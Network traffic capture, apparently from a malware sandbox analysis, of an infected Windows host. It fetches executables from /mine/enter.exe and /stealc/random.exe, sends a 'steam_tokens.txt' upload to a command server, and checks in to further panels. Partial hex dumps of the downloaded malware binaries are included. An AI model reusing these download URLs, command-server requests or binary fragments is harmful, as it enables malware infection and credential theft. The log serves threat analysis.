3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@fJ@K@WkJJ @.rsrc@.idata @ 0*@qzeqbxes0@qgghuozcJ@.taggant0J"@
Jul 26, 2024 20:09:17.190633059 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 20:09:17.190730095 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 20:09:17.191066980 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 20:09:17.191082001 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 20:09:17.191098928 CEST	1236	IN	Data Raw: f1 9a dc 65 35 74 8e 7f a3 3a 79 64 d1 66 3c cc 15 d1 48 65 9e 85 5e 62 a2 a6 22 cd f5 65 6d 8f 9a 6a 79 cb 91 bd dc f3 1a 99 c5 97 9a d6 90 78 71 da 6e 53 69 98 6f 17 b3 77 a8 4b 16 88 e0 02 b3 77 bc 57 95 96 03 5c d4 7a 78 67 31 78 1c 54 75 13 Data Ascii: e5t:ydf<He^b"emjyxqnSiowKwW\zxg1xTuc.qcgK5q3c]wkK/\KU,2gv5me0fpc\dedb^/U'UingT]vHUNmFjgwk
Jul 26, 2024 20:09:17.192053080 CEST	656	IN	Data Raw: a1 6c 67 45 6b 3c 96 d7 a8 0e 57 a3 cb ad d7 c0 9a 56 d1 42 07 6f cd 41 63 5d cc ba a3 57 a2 9a e3 3e 29 5c 95 9f 06 dd 0a b5 8f ab d5 6e b6 c9 be 77 92 61 43 b0 c1 5c 83 b3 96 90 b4 ef a2 a2 e0 98 92 48 08 45 35 80 da 77 6e 87 0a 8d 04 0c 33 a8 Data Ascii: lgEk<WVBoAc]W>)\nwaC\HE5wn3L]P0<cf1^0HZkhF@hR[[S1Cd^fBO3jc~H@G4pGXEeZ\H,J,xk);RbBc>>_`GZ1
Jul 26, 2024 20:09:17.192116022 CEST	1236	IN	Data Raw: 53 c6 14 94 16 6b 34 f2 e3 ed a1 3f 89 c9 ed 22 d8 50 bb e9 33 d1 24 a4 1f ca 9c 87 85 32 41 06 94 81 0d c7 8a 58 be 63 f3 1b 24 05 8d 66 d3 89 6a 10 87 0c 23 27 15 53 f2 99 54 a9 1b 6a 54 7c 58 9a 04 46 a4 41 65 0a a4 71 7b be 6e 32 35 79 47 73 Data Ascii: Sk4?"P3$2AXc$fj#'STjT\|XFAeq{n25yGsS:`qu^J]SYj, /cPQgbFFVpS1#PXZR5k{CS0x<JScHX"p];e]1+\[SY]~tIt:*I]
Jul 26, 2024 20:09:17.192575932 CEST	1236	IN	Data Raw: f4 6d 93 fe 12 49 15 f8 14 60 50 ab ea 57 94 f3 4c da bb 40 cc c8 ee 9e 5e a3 10 bc 48 e7 65 4f 42 62 f6 c9 d5 fa 6e e1 2b b6 0e 74 1b 74 8f 57 1d a9 99 c0 a4 2f ac c6 17 c9 58 99 14 bf 33 84 ed cb 2c 56 7a f2 e1 6f ae 90 df b1 1a 99 88 45 06 a7 Data Ascii: mI`PWL@^HeOBbn+ttW/X3,VzoEk\|WbG8d$(sOZ!$VZ+fQYl/Flf.r1E ll!{^B}Y1\p2GMF#4,t~HX{"Tekz
Jul 26, 2024 20:09:17.192595959 CEST	448	IN	Data Raw: d4 1a 15 fc 73 df 02 0c df 34 d3 95 5e 65 5f 89 da 37 a5 4b 14 96 f0 01 5b 2f 6b 94 a7 6f d2 5e f1 5e 97 1a d7 6d 9e 8e 96 db 40 e7 25 7b 5c 8a 72 b8 0c ce a8 b4 9d 81 90 8c 9a 29 27 02 bb 35 8c 1d 45 53 1d 1f 3a 20 d2 29 17 9e f1 d3 20 d2 52 e9 Data Ascii: s4^e_7K[/ko^^m@%{\r)'5ES: ) RpdXZ]T0m^$o0l`=UUwjmS'HetG$8O4\f80W:S9~fZMUeUUXsHPoNASGnfe
Jul 26, 2024 20:09:17.195512056 CEST	1236	IN	Data Raw: d6 6f 16 16 77 75 e8 23 6d 8e 83 70 47 a4 59 8a 54 88 4c 4a cd 34 c1 70 b6 81 3f 63 cb 7b 4a 84 11 17 4c 48 94 ad 34 41 d0 fb 59 22 ce 55 a0 ed c2 16 be 46 14 d7 aa d0 96 14 95 f3 d3 45 f2 f0 43 e6 20 fd 38 40 69 49 2a 2e 8d ff 1f d5 a1 a6 e4 41 Data Ascii: owu#mpGYTLJ4p?c{JLH4AY"UFEC 8@iI*.APM.Cc;}2/!P:yaw5Abm>~"cTB{>fp%W_svjHXB8BCn&W.6e\u[~}ayffoJ@Rc"4(T:j=P8
Jul 26, 2024 20:09:19.278048992 CEST	79	OUT	GET /mine/enter.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 20:09:19.522016048 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:09:19 GMT Content-Type: application/octet-stream Content-Length: 1909760 Last-Modified: Fri, 26 Jul 2024 17:32:08 GMT Connection: keep-alive ETag: "66a3dd98-1d2400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELAfK@ L:@Wk4KK @.rsrc@.idata @ +@usoriijt1@ymfuwjgbK@.taggant0K"@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	85.28.47.31	80	3436	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:09:21.414011002 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file"------AFCBAEBAEBFHCAKFCAKE--
Jul 26, 2024 20:09:22.459980011 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:22.741626978 CEST	463	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI Host: 85.28.47.31 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="message"files------KJKKJKEHDBGIDGDHCFHI--
Jul 26, 2024 20:09:22.923803091 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:22.962363958 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGIJDGCAEBFIIECAKFHI--
Jul 26, 2024 20:09:23.740984917 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49725	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:03.508136988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:04.270829916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:04.271816015 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:04.532131910 CEST	381	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 62 66 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 33 39 31 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 30 30 30 30 33 30 30 32 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 38 66 64 61 37 64 66 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: bf <c>1000002001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca73910e5ebf5de04349025080d9#1000003002+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49724	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:03.508222103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:04.304706097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:04.305562019 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:04.560110092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49726	185.215.113.16	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:04.541235924 CEST	57	OUT	GET /stealc/random.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 20:10:05.333445072 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:05 GMT Content-Type: application/octet-stream Content-Length: 250880 Last-Modified: Fri, 26 Jul 2024 17:47:55 GMT Connection: keep-alive ETag: "66a3e14b-3d400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 40 67 94 73 04 06 fa 20 04 06 fa 20 04 06 fa 20 6b 70 51 20 1f 06 fa 20 6b 70 64 20 14 06 fa 20 6b 70 50 20 60 06 fa 20 0d 7e 69 20 0f 06 fa 20 04 06 fb 20 76 06 fa 20 6b 70 55 20 05 06 fa 20 6b 70 60 20 05 06 fa 20 6b 70 67 20 05 06 fa 20 52 69 63 68 04 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7b ca c8 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1c 02 00 00 78 03 02 00 00 00 00 c9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 52 40 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@gs kpQ kpd kpP ` ~i v kpU kp` kpg Rich PEL{dx 0@`R@Xx\YS@0.text `.rdata204 @@.data.pT@.xipewav0@@.gata4@.rsrc8@@
Jul 26, 2024 20:10:05.333998919 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8b f1 c7 06 a4 53 42 00 e8 ac 06 00 00 f6 44 24 08 01 74 07 56 e8 d3 0b 00 00 Data Ascii: VSBD$tVY^4U( BeE$BV3W{EEu(BE?E,BEE EE~DM=u~D@.=u%\|yDEEEEU
Jul 26, 2024 20:10:05.334011078 CEST	1236	IN	Data Raw: 4f 75 c4 68 8c 53 42 00 ff 15 6c 30 42 00 ff 15 80 79 44 02 5f 5e 5b c9 c3 55 8b ec 81 ec 04 04 00 00 56 33 f6 81 3d f4 7e 44 02 00 04 00 00 57 75 45 56 56 56 56 ff 15 8c 30 42 00 56 56 56 56 56 56 56 56 56 56 ff 15 a0 31 42 00 56 56 e8 56 09 00 Data Ascii: OuhSBl0ByD_^[UV3=~DWuEVVVV0BVVVVVVVVVV1BVVVVVVVV(VVV(3*m}VEPVVV0BV0B`0BV0B.G\|dB~D7=~DuVPP0BOu_3^U
Jul 26, 2024 20:10:05.336591959 CEST	1236	IN	Data Raw: 74 e4 6a 00 ff 70 04 ff 30 ff 75 08 e8 f3 22 00 00 83 c4 10 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 53 8b 5d 0c 56 57 8b 7d 10 89 4d f8 89 5d fc 85 ff 74 1a 83 7d 14 00 74 14 85 c9 75 17 e8 39 17 00 00 c7 00 16 00 00 00 e8 dc 16 00 00 33 c0 5f 5e Data Ascii: tjp0u"]UMS]VW}M]t}tu93_^[ut39Ev!tSjQY+t39Ew}F}tFEEFtDFt=;r;}W6uuk*)~>}+
Jul 26, 2024 20:10:05.336604118 CEST	1236	IN	Data Raw: c3 8b ff 55 8b ec 83 7d 08 00 75 0b ff 75 0c e8 3c 13 00 00 59 5d c3 56 8b 75 0c 85 f6 75 0d ff 75 08 e8 4f 14 00 00 59 33 c0 eb 4d 57 eb 30 85 f6 75 01 46 56 ff 75 08 6a 00 ff 35 a4 4a 43 00 ff 15 bc 30 42 00 8b f8 85 ff 75 5e 39 05 a0 4a 43 00 Data Ascii: U}uu<Y]VuuuOY3MW0uFVuj5JC0Bu^9JCt@Vc-YtvVS-Y83_^]'`0BPY`0BPYQ@2BG-YUVEtVY^]UE3+]U
Jul 26, 2024 20:10:05.341427088 CEST	1236	IN	Data Raw: 0d 00 00 83 20 00 eb 28 8b 45 08 8a 00 8b cf 4b e8 90 ff ff ff ff 45 08 83 3e ff 75 13 e8 b2 0d 00 00 83 38 2a 75 0d 8b cf b0 3f e8 75 ff ff ff 85 db 7f d4 e8 9b 0d 00 00 83 38 00 75 0a e8 91 0d 00 00 8b 4d fc 89 08 5e 5b c9 c3 8b ff 55 8b ec 81 Data Ascii: (EKE>u8*u?u8uM^[Ux\|B3ES]Vu3Wu}ku+t`pF@u^VY tB
Jul 26, 2024 20:10:05.341438055 CEST	776	IN	Data Raw: 00 8b 8d e8 fd ff ff 83 f9 ff 75 05 b9 ff ff ff 7f 83 c3 04 f7 85 f0 fd ff ff 10 08 00 00 89 9d d8 fd ff ff 8b 5b fc 89 9d e4 fd ff ff 0f 84 ab 04 00 00 3b de 75 0b a1 24 70 42 00 89 85 e4 fd ff ff 8b 85 e4 fd ff ff c7 85 c8 fd ff ff 01 00 00 00 Data Ascii: u[;u$pByXHHty+'HHt0CPhPPGtC/;t;H;t4
Jul 26, 2024 20:10:05.344512939 CEST	1236	IN	Data Raw: d6 ff d0 59 59 80 3f 2d 75 11 81 8d f0 fd ff ff 00 01 00 00 47 89 bd e4 fd ff ff 57 e9 0a fe ff ff c7 85 e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 bd fc ff ff 48 48 0f 84 90 fe ff ff 83 e8 03 0f 85 b7 01 00 00 c7 85 b8 fd ff Data Ascii: YY?-uGW$sHH'pQ0LR t@tCCC@t3@t\|s
Jul 26, 2024 20:10:05.344522953 CEST	1236	IN	Data Raw: f0 fd ff ff 8b 45 04 8d 4d 04 89 8d f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 8b 49 fc 89 8d e4 fd ff ff 8b 4d 0c 89 8d e0 fc ff ff 8b 4d 10 89 8d e4 fc ff ff 89 85 ec fc ff ff ff 15 d8 30 42 00 6a 00 8b f8 ff 15 d4 30 42 00 8d Data Ascii: EM0IMM0Bj0BP0BuutSAYM_3[S@VjVjV0BP0B^U5LJC0Bt]uuuuu3PPPPPUE3;(pB
Jul 26, 2024 20:10:05.344532967 CEST	1236	IN	Data Raw: c3 83 c0 20 50 ff 15 f4 30 42 00 5d c3 8b ff 55 8b ec 83 ec 4c 56 8d 45 b4 50 ff 15 c8 30 42 00 6a 40 6a 20 5e 56 e8 65 39 00 00 59 59 33 c9 3b c1 75 08 83 c8 ff e9 0f 02 00 00 8d 90 00 08 00 00 a3 60 8d 44 02 89 35 5c 8d 44 02 3b c2 73 36 83 c0 Data Ascii: P0B]ULVEP0Bj@j ^Ve9YY3;u`D5\D;s6Hf@Hf@@!H3H/5`D@P;rSWf9ME;EE;\|9\D}kdDj@j 8YYtQ\D ;s1H``
